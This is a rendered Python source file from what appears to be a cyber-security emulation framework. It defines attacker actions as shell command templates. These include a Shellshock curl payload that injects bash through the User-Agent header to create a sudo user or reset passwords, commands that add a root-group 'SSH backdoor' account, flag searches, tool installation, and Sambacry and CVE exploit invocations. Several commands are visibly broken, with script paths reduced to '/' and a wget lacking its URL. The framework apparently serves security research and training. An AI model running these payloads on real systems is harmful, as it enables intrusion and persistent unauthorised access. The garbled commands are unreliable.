Source code for csle_common.dao.emulation_action.attacker.emulation_attacker_shell_actions

import csle_common.constants.constants as constants
from csle_common.dao.emulation_action.attacker.emulation_attacker_action import EmulationAttackerAction
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_type import EmulationAttackerActionType
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_id import EmulationAttackerActionId
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_outcome import EmulationAttackerActionOutcome

[docs]class EmulationAttackerShellActions: """ Class implementing regular Bash actions for the attacker (e.g. interacting with filesystem or OS) in the emulation """
[docs] @staticmethod def FIND_FLAG(index: int) -> EmulationAttackerAction: """ Searches through the file systems that have been compromised to find a flag :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.FIND_FLAG cmd = ["find / -name 'flag*.txt' 2>&1 | grep -v 'Permission denied'"] alt_cmd = ["find / | grep 'flag*'"] return EmulationAttackerAction(id=id, name="Find flag", cmds=cmd, type=EmulationAttackerActionType.POST_EXPLOIT, descr="Searches the file system for a flag", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.FLAG, alt_cmds=alt_cmd, backdoor=False)
[docs] @staticmethod def INSTALL_TOOLS(index: int) -> EmulationAttackerAction: """ Installs tools on compromised machines :param index: index of the machine to apply the action to :return: the created action """ id = EmulationAttackerActionId.INSTALL_TOOLS cmd = ["sudo apt-get -y install nmap ssh git unzip lftp", "cd /;sudo wget -c " "-O && sudo unzip -o && sudo rm -f && " "sudo mv SecLists-master /SecLists"] return EmulationAttackerAction(id=id, name="Install tools", cmds=cmd, type=EmulationAttackerActionType.POST_EXPLOIT, descr="If taken root on remote machine, installs pentest tools, e.g. nmap", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.PIVOTING, alt_cmds=None, backdoor=False)
[docs] @staticmethod def SSH_BACKDOOR(index: int) -> EmulationAttackerAction: """ Installs a SSH backdoor on a compromised machine :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.SSH_BACKDOOR cmd = ["sudo service ssh start", "sudo useradd -rm -d /home/{} -s /bin/bash -g root -G " "sudo -p \"$(openssl passwd -1 '{}')\" {}"] return EmulationAttackerAction(id=id, name="Install SSH backdoor", cmds=cmd, type=EmulationAttackerActionType.POST_EXPLOIT, descr="If taken root on remote machine, installs a ssh backdoor," " useful for upgrading telnet" "or weaker channels", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.PIVOTING, alt_cmds=None, backdoor=True)
[docs] @staticmethod def SAMBACRY_EXPLOIT(index: int) -> EmulationAttackerAction: """ Launches the sambacry exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.SAMBACRY_EXPLOIT cmd = ["sudo /root/miniconda3/envs/samba/bin/python / -e / -s data " "-r /data/ -u sambacry -p nosambanocry -P 6699 -t {}"] return EmulationAttackerAction(id=id, name="Sambacry Explolit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT, descr="Uses the sambacry shell to get remote code execution and " "then sets up a SSH backdoor to upgrade the channel", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None, vulnerability=constants.SAMBA.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def SHELLSHOCK_EXPLOIT(index: int) -> EmulationAttackerAction: """ Launches the shellshock exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.SHELLSHOCK_EXPLOIT cmd = ["curl -H \"user-agent: () {{ :; }}; echo; echo; /bin/bash -c " "'sudo useradd -rm -d /home/{} -s /bin/bash -g root -G sudo " "-p $(openssl passwd -1 \'{}\') {}'\" http://{}:80/cgi-bin/vulnerable", "curl -H \"user-agent: () {{ :; }}; echo; echo; /bin/bash -c 'echo {}:{} | sudo /usr/sbin/chpasswd'\" " "http://{}:80/cgi-bin/vulnerable" ] return EmulationAttackerAction(id=id, name="ShellShock Explolit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT, descr="Uses the Shellshock exploit and curl to do " "remote code execution and create a backdoor", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None, vulnerability=constants.SHELLSHOCK.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def DVWA_SQL_INJECTION(index: int) -> EmulationAttackerAction: """ Launches the DVWA SQL Injection exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.DVWA_SQL_INJECTION cmd = ["/"] return EmulationAttackerAction(id=id, name="DVWA SQL Injection Exploit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT, descr="Uses the DVWA SQL Injection exploit to extract secret passwords", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None, vulnerability=constants.DVWA_SQL_INJECTION.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def CVE_2015_3306_EXPLOIT(index: int) -> EmulationAttackerAction: """ Launches the CVE-2015-3306 exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.CVE_2015_3306_EXPLOIT cmd = ["sudo /root/miniconda3/bin/python3 / " "--port 21 --path '/var/www/html/' --host {}"] return EmulationAttackerAction( id=id, name="CVE-2015-3306 exploit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT, descr="Uses the CVE-2015-3306 vulnerability to get remote code execution and then sets up a SSH backdoor " "to upgrade the channel", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None, vulnerability=constants.CVE_2015_3306.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def CVE_2015_1427_EXPLOIT(index: int) -> EmulationAttackerAction: """ Launches the CVE-2015-1427 exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.CVE_2015_1427_EXPLOIT cmd = ["/ {}:9200"] return EmulationAttackerAction( id=id, name="CVE-2015-1427 exploit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT, descr="Uses the CVE-2015-1427 vulnerability to get remote code execution and then sets up a SSH backdoor " "to upgrade the channel", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None, vulnerability=constants.CVE_2015_1427.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def CVE_2016_10033_EXPLOIT(index: int) -> EmulationAttackerAction: """ Launches the CVE-2016-10033 exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.CVE_2016_10033_EXPLOIT cmd = ["/ {}:80"] return EmulationAttackerAction(id=id, name="CVE-2016-10033 exploit", cmds=cmd, type=EmulationAttackerActionType.EXPLOIT, descr="Uses the CVE-2016-10033 vulnerability to get remote " "code execution and then sets up a SSH backdoor " "to upgrade the channel", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.SHELL_ACCESS, alt_cmds=None, vulnerability=constants.CVE_2016_10033.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def CVE_2010_0426_PRIV_ESC(index: int) -> EmulationAttackerAction: """ Launches the CVE-2010-0426 exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.CVE_2010_0426_PRIV_ESC cmd = ["/ {}", "/"] return EmulationAttackerAction(id=id, name="CVE-2010-0426 exploit", cmds=cmd, type=EmulationAttackerActionType.PRIVILEGE_ESCALATION, descr="Uses the CVE-2010-0426 vulnerability to " "perform privilege escalation to get root access", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.PRIVILEGE_ESCALATION_ROOT, alt_cmds=None, vulnerability=constants.CVE_2010_0426.VULNERABILITY_NAME, backdoor=True)
[docs] @staticmethod def CVE_2015_5602_PRIV_ESC(index: int) -> EmulationAttackerAction: """ Launches the CVE-2015-5602 exploit :param index: index of the machine to apply the action to :return: the action """ id = EmulationAttackerActionId.CVE_2015_5602_PRIV_ESC cmd = ["/", "su root", constants.CVE_2015_5602.ROOT_PW, "/"] return EmulationAttackerAction(id=id, name="CVE-2015-5602 exploit", cmds=cmd, type=EmulationAttackerActionType.PRIVILEGE_ESCALATION, descr="Uses the CVE-2015-5602 vulnerability to perform " "privilege escalation to get root access", index=index, ips=[], action_outcome=EmulationAttackerActionOutcome.PRIVILEGE_ESCALATION_ROOT, alt_cmds=None, vulnerability=constants.CVE_2015_5602.VULNERABILITY_NAME, backdoor=True)